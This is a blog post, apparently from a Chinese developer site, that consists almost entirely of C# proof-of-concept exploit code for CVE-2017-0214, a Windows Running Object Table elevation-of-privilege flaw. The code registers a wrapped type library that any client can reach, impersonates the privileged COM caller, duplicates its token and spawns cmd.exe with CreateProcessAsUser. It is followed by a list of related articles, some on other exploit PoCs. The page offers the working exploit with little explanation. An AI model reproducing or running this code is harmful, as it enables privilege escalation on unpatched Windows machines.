CVE-2017-0214Poc

最新推荐文章于 2021-07-28 23:16:20 发布
最新推荐文章于 2021-07-28 23:16:20 发布
阅读量346 收藏
点赞数 
using Microsoft.Win32.SafeHandles;
using MSSITLB;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.ConstrainedExecution;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;
using System.Runtime.Versioning;
using System.Security;
using System.Security.Permissions;
using System.Security.Principal;
using System.Text;
using IS = System.Runtime.InteropServices;

namespace PoC_RotRegistrationEoP
{
    static class Utils
    {
        [IS.DllImport("rpcrt4.dll")]
        static extern int I_RpcBindingInqLocalClientPID(IntPtr ClientBinding, out int ClientPID);

        public static int GetRpcPid()
        {
            int pid;
            if (I_RpcBindingInqLocalClientPID(IntPtr.Zero, out pid) == 0)
            {
                return pid;
            }
            return -1;
        }
    }

    [IS.ComVisible(true)]
    class TypeInfoWrapper : ITypeInfo2, ITypeInfo
    {
        private ITypeInfo2 _type_info;

        public TypeInfoWrapper(ITypeInfo2 type_info)
        {
            _type_info = type_info;
        }

        public TypeInfoWrapper(ITypeInfo type_info)
            : this((ITypeInfo2)type_info)
        {
        }

        public void AddressOfMember(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, out IntPtr ppv)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.AddressOfMember(memid, invKind, out ppv);
        }

        public void CreateInstance(object pUnkOuter, ref Guid riid, out object ppvObj)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.CreateInstance(pUnkOuter, ref riid, out ppvObj);
        }

        public void GetAllCustData(IntPtr pCustData)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetAllCustData(pCustData);
        }

        public void GetAllFuncCustData(int index, IntPtr pCustData)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetAllFuncCustData(index, pCustData);
        }

        public void GetAllImplTypeCustData(int index, IntPtr pCustData)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetAllImplTypeCustData(index, pCustData);
        }

        public void GetAllParamCustData(int indexFunc, int indexParam, IntPtr pCustData)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetAllParamCustData(indexFunc, indexParam, pCustData);
        }

        public void GetAllVarCustData(int index, IntPtr pCustData)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetAllVarCustData(index, pCustData);
        }

        public void GetContainingTypeLib(out ITypeLib ppTLB, out int pIndex)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            ITypeLib type_lib;
            _type_info.GetContainingTypeLib(out type_lib, out pIndex);
            ppTLB = new TypeLibWrapper(type_lib);
        }

        public void GetCustData(ref Guid guid, out object pVarVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetCustData(ref guid, out pVarVal);
        }

        public void GetDllEntry(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, IntPtr pBstrDllName, IntPtr pBstrName, IntPtr pwOrdinal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetDllEntry(memid, invKind, pBstrDllName, pBstrName, pwOrdinal);
        }

        public void GetDocumentation(int index, out string strName, out string strDocString, out int dwHelpContext, out string strHelpFile)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetDocumentation(index, out strName, out strDocString, out dwHelpContext, out strHelpFile);
        }

        public void GetDocumentation2(int memid, out string pbstrHelpString, out int pdwHelpStringContext, out string pbstrHelpStringDll)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetDocumentation2(memid, out pbstrHelpString, out pdwHelpStringContext, out pbstrHelpStringDll);
        }

        public void GetFuncCustData(int index, ref Guid guid, out object pVarVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetFuncCustData(index, ref guid, out pVarVal);
        }

        public void GetFuncDesc(int index, out IntPtr ppFuncDesc)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetFuncDesc(index, out ppFuncDesc);
        }

        public void GetFuncIndexOfMemId(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, out int pFuncIndex)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetFuncIndexOfMemId(memid, invKind, out pFuncIndex);
        }

        public void GetIDsOfNames(string[] rgszNames, int cNames, int[] pMemId)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetIDsOfNames(rgszNames, cNames, pMemId);
        }

        public void GetImplTypeCustData(int index, ref Guid guid, out object pVarVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetImplTypeCustData(index, ref guid, out pVarVal);
        }

        public void GetImplTypeFlags(int index, out System.Runtime.InteropServices.ComTypes.IMPLTYPEFLAGS pImplTypeFlags)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetImplTypeFlags(index, out pImplTypeFlags);
        }

        public void GetMops(int memid, out string pBstrMops)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetMops(memid, out pBstrMops);
        }

        public void GetNames(int memid, string[] rgBstrNames, int cMaxNames, out int pcNames)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetNames(memid, rgBstrNames, cMaxNames, out pcNames);
        }

        public void GetParamCustData(int indexFunc, int indexParam, ref Guid guid, out object pVarVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetParamCustData(indexFunc, indexParam, ref guid, out pVarVal);
        }

        public void GetRefTypeInfo(int hRef, out ITypeInfo ppTI)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);

            ITypeInfo type_info;
            _type_info.GetRefTypeInfo(hRef, out type_info);
            ppTI = new TypeInfoWrapper(type_info);
        }

        public void GetRefTypeOfImplType(int index, out int href)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetRefTypeOfImplType(index, out href);
        }

        public void GetTypeAttr(out IntPtr ppTypeAttr)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetTypeAttr(out ppTypeAttr);
        }

        public void GetTypeComp(out ITypeComp ppTComp)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetTypeComp(out ppTComp);
        }

        public void GetTypeFlags(out int pTypeFlags)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetTypeFlags(out pTypeFlags);
        }

        public void GetTypeKind(out System.Runtime.InteropServices.ComTypes.TYPEKIND pTypeKind)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetTypeKind(out pTypeKind);
        }

        public void GetVarCustData(int index, ref Guid guid, out object pVarVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetVarCustData(index, ref guid, out pVarVal);
        }

        public void GetVarDesc(int index, out IntPtr ppVarDesc)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetVarDesc(index, out ppVarDesc);
        }

        public void GetVarIndexOfMemId(int memid, out int pVarIndex)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetVarIndexOfMemId(memid, out pVarIndex);
        }

        public void Invoke(object pvInstance, int memid, short wFlags, ref System.Runtime.InteropServices.ComTypes.DISPPARAMS pDispParams, IntPtr pVarResult, IntPtr pExcepInfo, out int puArgErr)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.Invoke(pvInstance, memid, wFlags, ref pDispParams, pVarResult, pExcepInfo, out puArgErr);
        }

        public void ReleaseFuncDesc(IntPtr pFuncDesc)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.ReleaseFuncDesc(pFuncDesc);
        }

        public void ReleaseTypeAttr(IntPtr pTypeAttr)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.ReleaseTypeAttr(pTypeAttr);
        }

        public void ReleaseVarDesc(IntPtr pVarDesc)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.ReleaseVarDesc(pVarDesc);
        }
    }
  
    [StructLayout(LayoutKind.Sequential)]
    internal class PROCESS_INFORMATION
    {
        // The handles in PROCESS_INFORMATION are initialized in unmanaged functions.
        // We can't use SafeHandle here because Interop doesn't support [out] SafeHandles in structures/classes yet.            
        public IntPtr hProcess = IntPtr.Zero;
        public IntPtr hThread = IntPtr.Zero;
        public int dwProcessId = 0;
        public int dwThreadId = 0;

        // Note this class makes no attempt to free the handles
        // Use InitialSetHandle to copy to handles into SafeHandles

    }
    [IS.ComVisible(true)]
    class TypeLibWrapper : ITypeLib2, ITypeLib
    {
        [DllImport("ole32.dll", ExactSpelling = true, PreserveSig = false)]
        [return: MarshalAs(UnmanagedType.Interface)]
        static extern object CoGetCallContext([In, MarshalAs(UnmanagedType.LPStruct)] Guid riid);

        Guid gd=new Guid("{0000013E-0000-0000-C000-000000000046}");
        private ITypeLib2 _tlb;

        public TypeLibWrapper(ITypeLib2 tlb)
        {
            _tlb = tlb;
        }

        public TypeLibWrapper(ITypeLib tlb)
            : this((ITypeLib2)tlb)
        {
        }


        [IS.DllImport("oleaut32.dll", CharSet = IS.CharSet.Unicode, PreserveSig = false)]
        static extern ITypeLib LoadTypeLib(string strTypeLibName);

        public TypeLibWrapper(string typelibname)
            
        {
            try
            {
                _tlb = (ITypeLib2)LoadTypeLib(typelibname);
                int a = 0;
            }
            catch (Exception)
            {
                
                throw;
            }
            
        }

        public void FindName(string szNameBuf, int lHashVal, ITypeInfo[] ppTInfo, int[] rgMemId, ref short pcFound)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.FindName(szNameBuf, lHashVal, ppTInfo, rgMemId, ref pcFound);
        }

        public void GetAllCustData(IntPtr pCustData)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetAllCustData(pCustData);
        }

        public void GetCustData(ref Guid guid, out object pVarVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetCustData(ref guid, out pVarVal);
        }

        public void GetDocumentation(int index, out string strName, out string strDocString, out int dwHelpContext, out string strHelpFile)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetDocumentation(index, out strName, out strDocString, out dwHelpContext, out strHelpFile);
        }

        public void GetDocumentation2(int index, out string pbstrHelpString, out int pdwHelpStringContext, out string pbstrHelpStringDll)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetDocumentation2(index, out pbstrHelpString, out pdwHelpStringContext, out pbstrHelpStringDll);
        }
        internal const String ADVAPI32 = "advapi32.dll";
        internal const String KERNEL32 = "kernel32.dll";
        [DllImport(ADVAPI32, SetLastError = true, EntryPoint = "OpenThreadToken")]
        [ResourceExposure(ResourceScope.None)]
        internal static extern bool
        OpenCurrentThreadToken(
            [In] IntPtr ThreadHandle,
            [In] TokenAccessLevels DesiredAccess,
            [In] bool OpenAsSelf,
            [Out] out IntPtr TokenHandle);
        [DllImport(KERNEL32, SetLastError = true)]
        [ResourceExposure(ResourceScope.None)]
        internal static extern IntPtr
        GetCurrentThread();
        internal enum SECURITY_IMPERSONATION_LEVEL
        {
            Anonymous = 0,
            Identification = 1,
            Impersonation = 2,
            Delegation = 3,
        }
        [Serializable]
        internal enum TokenTypeVal : int
        {
            TokenPrimary = 1,
            TokenImpersonation
        }
        [ReliabilityContract(Consistency.WillNotCorruptState, Cer.MayFail)]
        [DllImport(ADVAPI32, CharSet = CharSet.Auto, SetLastError = true)]
        [ResourceExposure(ResourceScope.None)]
        internal static extern
        bool DuplicateTokenEx(
            [In]     IntPtr ExistingTokenHandle,
            [In]     TokenAccessLevels DesiredAccess,
            [In]     IntPtr TokenAttributes,
            [In]     SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
            [In]     TokenTypeVal TokenType,
            [In, Out] ref IntPtr DuplicateTokenHandle);
       
       
        [DllImport(ADVAPI32, CharSet = System.Runtime.InteropServices.CharSet.Auto, SetLastError = true, BestFitMapping = false)]
        [System.Security.SuppressUnmanagedCodeSecurityAttribute()]
        [ResourceExposure(ResourceScope.Machine)]
        public extern static bool CreateProcessAsUser(IntPtr hToken, String lpApplicationName, String lpCommandLine, ref SecurityAttributes lpProcessAttributes,
             ref SecurityAttributes lpThreadAttributes, bool bInheritHandle, int dwCreationFlags, IntPtr lpEnvironment,
             String lpCurrentDirectory, ref StartupInfo lpStartupInfo, out ProcessInformation lpProcessInformation);


        [StructLayout(LayoutKind.Sequential)]
        public struct StartupInfo
        {
            public int cb;
            public String lpReserved;
            public String lpDesktop;
            public String lpTitle;
            public uint dwX;
            public uint dwY;
            public uint dwXSize;
            public uint dwYSize;
            public uint dwXCountChars;
            public uint dwYCountChars;
            public uint dwFillAttribute;
            public uint dwFlags;
            public short wShowWindow;
            public short cbReserved2;
            public IntPtr lpReserved2;
            public IntPtr hStdInput;
            public IntPtr hStdOutput;
            public IntPtr hStdError;
        }

        [StructLayout(LayoutKind.Sequential)]
        public struct ProcessInformation
        {
            public IntPtr hProcess;
            public IntPtr hThread;
            public uint dwProcessId;
            public uint dwThreadId;
        }

        [StructLayout(LayoutKind.Sequential)]
        public struct SecurityAttributes
        {
            public int Length;
            public IntPtr lpSecurityDescriptor;
            public bool bInheritHandle;
        }
        [DllImport("ole32.dll")]
        static extern int CoQueryClientBlanket(out IntPtr pAuthnSvc, out IntPtr pAuthzSvc,
            [MarshalAs(UnmanagedType.LPWStr)] out StringBuilder pServerPrincName, out IntPtr
            pAuthnLevel, out IntPtr pImpLevel, out IntPtr pPrivs, out IntPtr pCapabilities);
        public void GetLibAttr(out IntPtr ppTLibAttr)
        {
            System.Diagnostics.Process.Start(@"C:\Windows\System32\cmd.exe");
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            Console.WriteLine("firstShoot");
            IntPtr threadPtr1=IntPtr.Zero;
            IntPtr threadPtr23=IntPtr.Zero;
            IntPtr threadPtr3=IntPtr.Zero;
            IntPtr threadPtr4=IntPtr.Zero;
            IntPtr threadPtr5=IntPtr.Zero;
            IntPtr threadPtr6=IntPtr.Zero;
            StringBuilder sb = new StringBuilder();
            CoQueryClientBlanket(out threadPtr1, out  threadPtr23,out sb, out threadPtr3, out threadPtr4, out threadPtr5, out threadPtr6);
            string s = sb.ToString();
            IntPtr tokenHandle = IntPtr.Zero;
            IntPtr threadPtr = GetCurrentThread();
            bool isSuccess = OpenCurrentThreadToken(threadPtr, TokenAccessLevels.Query, true, out tokenHandle);
            Console.WriteLine("threadPtr1is:" + tokenHandle);
            IServerSecurity pss = CoGetCallContext(gd) as IServerSecurity;
            int a = pss.ImpersonateClient();
            IntPtr tokenHandle2 = IntPtr.Zero;
            IntPtr threadPtr2 = GetCurrentThread();
             isSuccess = OpenCurrentThreadToken(threadPtr2, TokenAccessLevels.Query, true, out tokenHandle2);
            Console.WriteLine("threadPtr2is:" + tokenHandle2);
            IntPtr hToken2 = IntPtr.Zero;
            var sa = new SecurityAttributes { bInheritHandle = false };
            sa.Length = Marshal.SizeOf(sa);
            isSuccess = DuplicateTokenEx(tokenHandle2, TokenAccessLevels.MaximumAllowed, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.Identification, TokenTypeVal.TokenPrimary, ref hToken2);
            Console.WriteLine("DuplicateTokenEx:" + tokenHandle + "err:" + Marshal.GetLastWin32Error());
          
				sa.lpSecurityDescriptor = (IntPtr)0;
            var si = new StartupInfo();
				si.cb = Marshal.SizeOf(si);
				si.lpDesktop = "";

				// ReSharper disable once RedundantAssignment
				var pi = new ProcessInformation();
                isSuccess = CreateProcessAsUser(tokenHandle2, "cmd.exe", @"C:\Windows\System32\cmd.exe", ref sa, ref sa, false, 0, (IntPtr)0, "C:\\", ref si, out pi);

            Console.WriteLine("CreateProcessAsUser:" + isSuccess);
            
            //IntPtr pwz = IntPtr.Zero;
            //IntPtr pwz2 = IntPtr.Zero;
            //pss.QueryBlanket(IntPtr.Zero, IntPtr.Zero, pwz, IntPtr.Zero, IntPtr.Zero, pwz2, IntPtr.Zero);
            //string s = Marshal.PtrToStringAuto(pwz);
            //string s2 = Marshal.PtrToStringAuto(pwz2);
            //System.Diagnostics.Process p = new System.Diagnostics.Process();
            //p.StartInfo.FileName = @"cmd.exe";
            //p.StartInfo.WindowStyle = ProcessWindowStyle.Normal;
            //p.Start();//启动程序
            //p.WaitForExit();
            
            _tlb.GetLibAttr(out ppTLibAttr);
            return;
        }

        public void GetLibStatistics(IntPtr pcUniqueNames, out int pcchUniqueNames)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetLibStatistics(pcUniqueNames, out pcchUniqueNames);
        }

        public void GetTypeComp(out ITypeComp ppTComp)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetTypeComp(out ppTComp);
        }

        public void GetTypeInfo(int index, out ITypeInfo ppTI)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            ITypeInfo type_info;
            _tlb.GetTypeInfo(index, out type_info);
            ppTI = new TypeInfoWrapper(type_info);
        }

        public int GetTypeInfoCount()
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            return _tlb.GetTypeInfoCount();
        }

        public void GetTypeInfoOfGuid(ref Guid guid, out ITypeInfo ppTInfo)
        {
          
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            ITypeInfo type_info;
            _tlb.GetTypeInfoOfGuid(ref guid, out type_info);
            ppTInfo = new TypeInfoWrapper(type_info);
        }

        public void GetTypeInfoType(int index, out System.Runtime.InteropServices.ComTypes.TYPEKIND pTKind)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetTypeInfoType(index, out pTKind);
        }

        public bool IsName(string szNameBuf, int lHashVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            return _tlb.IsName(szNameBuf, lHashVal);
        }

        public void ReleaseTLibAttr(IntPtr pTLibAttr)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.ReleaseTLibAttr(pTLibAttr);
        }
    }
    [ComImport]
    [Guid("26D6311A-A724-4C8C-B83A-2E60ECD47480")]
    public class mytestcom
    {

    }


    [ComImport]
    [Guid("E80A6EC1-39FB-462A-A56C-411EE9FC1AEB")]
    public interface Imytestcom
    {
        void mdtest();
    }

    [ComImport,
      Guid("0000013E-0000-0000-C000-000000000046"),
      InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    internal interface IServerSecurity
    {
        void QueryBlanket
        (
            IntPtr authnSvc,
            IntPtr authzSvc,
            IntPtr serverPrincipalName,
            IntPtr authnLevel,
            IntPtr impLevel,
            IntPtr clientPrincipalName,
            IntPtr Capabilities
        );
        [PreserveSig]
        int ImpersonateClient();
        [PreserveSig]
        int RevertToSelf();
        [PreserveSig]
        [return: MarshalAs(UnmanagedType.Bool)]
        bool IsImpersonating();
    }
    class Program
    {
        const String OLEAUT32 = "oleaut32.dll";

        [DllImport(OLEAUT32,
         ExactSpelling = true,
         CharSet = CharSet.Unicode,
         PreserveSig = true)]
        [ResourceExposure(ResourceScope.None)]
        internal static extern int LoadRegTypeLib(ref Guid rguid, ushort major, ushort minor, int lcid,
             [MarshalAs(UnmanagedType.Interface)] out object typeLib);

        const int RPC_C_AUTHN_LEVEL_DEFAULT = 0;
        const int RPC_C_IMP_LEVEL_IMPERSONATE = 3;
        const int EOAC_APPID = 8;

        [IS.DllImport("ole32.dll")]
        static extern int CoInitializeSecurity(
            ref Guid pSecDesc,
            int cAuthSvc,
            IntPtr asAuthSvc,
            IntPtr pReserved1,
            int dwAuthnLevel,
            int dwImpLevel,
            IntPtr pAuthList,
            int dwCapabilities,
            IntPtr pReserved3
            );

        [return: IS.MarshalAs(IS.UnmanagedType.Interface)]
        [IS.DllImport("ole32.dll", CharSet = IS.CharSet.Unicode, ExactSpelling = true, PreserveSig = false)]
        static extern IMoniker CreateFileMoniker(string lpszPathName);

        [return: IS.MarshalAs(IS.UnmanagedType.Interface)]
        [IS.DllImport("ole32.dll", CharSet = IS.CharSet.Unicode, ExactSpelling = true, PreserveSig = false)]
        static extern IRunningObjectTable GetRunningObjectTable(int reserved);

        const int ROTFLAGS_ALLOWANYCLIENT = 2;
        const int ROTFLAGS_REGISTRATIONKEEPSALIVE = 1;
        static Guid tapi3guid = new Guid("{21D6D480-A88B-11D0-83DD-00AA003CCABD}");
        [MTAThread]
        static void Main(string[] args)
        {
           
            try
            {
              // (new mytestcom() as Imytestcom).mdtest();
                //byte[] bs = File.ReadAllBytes(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "tapi3.dll"));

              //  File.WriteAllBytes("c:\\123\\1.raw",bs);
                if (args.Length < 1)
                {
                    Console.WriteLine("Usage: fake_typelib|-x");
                    return;
                }

                if (args[0] == "-x")
                {
                    //Console.WriteLine("Running PoC");
                    //Type t = Type.GetTypeFromCLSID(new Guid("9E175B68-F52A-11D8-B9A5-505054503030"));
                    //IGatherManagerAdmin2 mgr = (IGatherManagerAdmin2)Activator.CreateInstance(t);
                    //mgr.GetBackoffReason(0x12345678);

                    Type t = Type.GetTypeFromCLSID(new Guid("26D6311A-A724-4C8C-B83A-2E60ECD47480"));
                    Activator.CreateInstance(t);
                   // (new mytestcom() as Imytestcom).mdtest();
                }
                else
                {

                    //modified vervion
                     string tlb_path = "C:\\project\\testalt\\Debug\\testalt.dll";
                   // string tlb_path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "tapi3.dll");
                    //  Guid appid = new Guid("{4584EA27-6431-483D-8653-F96796E1A051}");
                  //  Guid appid = tapi3guid;
                    //new gen guid
                     //  Guid appid = new Guid("{4584EA27-6431-483D-8653-F96796E1A051}");

                    Guid appid =   new Guid("{3E5F704C-C0ED-491C-9BB5-EA1EAD8B31B7}");
                    //old 
                    // Guid appid = new Guid("{d056ebce-e7e9-4994-a5e6-de59430306c1}");
                    //  
                    int hr = CoInitializeSecurity(ref appid, -1, IntPtr.Zero, IntPtr.Zero,
                        RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero, EOAC_APPID, IntPtr.Zero);
                    if (hr != 0)
                    {
                        IS.Marshal.ThrowExceptionForHR(hr);
                    }

                   TypeLibWrapper tlb = new TypeLibWrapper("C:\\123\\sys\\testalt.dll");
                    IMoniker moniker = CreateFileMoniker(tlb_path);
                    IRunningObjectTable rot = GetRunningObjectTable(0);
                   int flags = ROTFLAGS_ALLOWANYCLIENT | ROTFLAGS_REGISTRATIONKEEPSALIVE;
                   // int flags = 0;
                    int cookie = rot.Register(flags, tlb, moniker);
                    byte[] bts = new byte[4096];

                  ///  (new mytestcom() as Imytestcom).mdtest();
                    Console.ReadKey();
                    using (FileStream stm = new FileStream(tlb_path, FileMode.Open, FileAccess.Read, FileShare.Read | FileShare.Delete))
                    {
                        stm.Lock(0, 4096);
                        Console.WriteLine("Waiting");
                       
                      //  Guid g = new Guid("{21D6D48E-A88B-11D0-83DD-00AA003CCABD}");

                        //frompoc
                        Guid g = new Guid("{9E175B68-F52A-11D8-B9A5-505054503030}");
                         object tpLib;
                      //    int b=  LoadRegTypeLib(ref tapi3guid, 1, 0, 0, out tpLib);

                         
                        while (stm.Read(bts, 0, 4096) > 0)
                        {
                            //Type t = Type.GetTypeFromCLSID(g);
                            //Activator.CreateInstance(t);

                            Process ps = Process.Start(Process.GetCurrentProcess().MainModule.FileName, "-x");

                             ps.WaitForExit();
                            Console.ReadKey();
                            Console.WriteLine("Exited");
                        }

                        Console.ReadKey();
                    }

                    rot.Revoke(cookie);
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }

            Console.ReadKey();
        }
    }
}

王cb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[渗透测试笔记] 28.复现CVE-2017-0146(永恒之蓝)
H4ppyD0g的博客
02-06 3155
所有内容仅作为个人学习和实验使用,请勿用于非法用途,后果自负! 第一次复现漏洞,感觉好好玩 ???? 永恒之蓝编号CVE-2017-0146,可通过MS17-010补丁修补此漏洞 CVE可以看成一个漏洞字典,用来给广泛认同的信息安全漏洞等提供一个公共的名称。通过使用同一个名称,可以在各自独立的漏洞库中起到一定的兼容性效果,并帮助在各个漏洞库中找到相关修补信息。 MS17-010是微软的一个安全类型的补...
类型库与ITypeLib接口
02-15
详细分析什么是类型库,介绍ITypeLib与ITypeInfo的使用机制,以及与IDISPATCH接口的区别
CVE-2017-0214
如鹿渴慕泉水的专栏
11-03 536
Windows: Running Object Table Register ROTFLAGS_ALLOWANYCLIENT EoP Platform: Windows 10 10586/14393 not tested 8.1 Update 2 or Windows 7 Class: Elevation of Privilege   Summary: B
CVE-2017-0217漏洞分析
cc菜的一批
06-12 1122
前言 第一次对CVE漏洞进行分析,写这篇文章是为了记录第一次,文笔很生疏,如有不足之处,欢迎各位师傅【斧】正! 1. CVE漏洞基本信息 漏洞描述(原理) 在 Microsoft 服务器消息块 (SMB) 1.0 中发现了多个漏洞,这些漏洞可在受影响主机上导致拒 绝服务或信息泄露。出现这些漏洞是因为受影响主机处理 SMBv1 请求的方式不正确。攻击者可通过向目标SMB发送特制的数据包利用该漏洞获取敏感信息。 本地攻击者通过构造的包,可获取敏感服务器信息,具体如下: 攻击结果: 获取目标服务器的Window
CVE-2017-7529Nginx越界读取缓存漏洞POC
weixin_45694388的博客
07-28 637
漏洞影响 低危,造成信息泄露,暴露真实ip等 实验内容 漏洞原理 通过查看patch确定问题是由于对http header中range域处理不当造成,焦点在ngx_http_range_parse 函数中的循环: HTTP头部range域的内容大约为Range: bytes=4096-8192bytes=-字符串指针p中即为“bytes=”后面的内容 这段代码是要把“-”两边的数字取出分别赋值给 start 和 end 变量标记读取文件的偏移和结束位置。 对于一般的页面文件这两个值怎么玩都没关系。但对于有
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
CVE-2017-3599poc
07-27
CVE-2017-3599,Unspecified vulnerability in the Oracle Document Capture component in Oracle Fusion Middleware 10.1.3.4 and 10.1.3.5 allows remote attackers to affect integrity and availability via ...
44913_sale3ho_CVE-2017-12636_POC_
09-30
CVE-2017-12636的POC,直接用python2运行就可以
Nginx越界读取缓存漏洞(CVE-2017-7529)
haha1314的博客
07-15 1272
Nginx越界读取缓存漏洞(CVE-2017-7529) 漏洞原理 参考阅读: https://cert.360.cn/detailnews.html?id=b879782fbad4a7f773b6c18490d67ac7 http://galaxylab.org/cve-2017-7529-nginx整数溢出漏洞分析/ Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件...
CVE-2017-7529:Nginx敏感信息泄露 分析
Endeavour的博客
07-12 2293
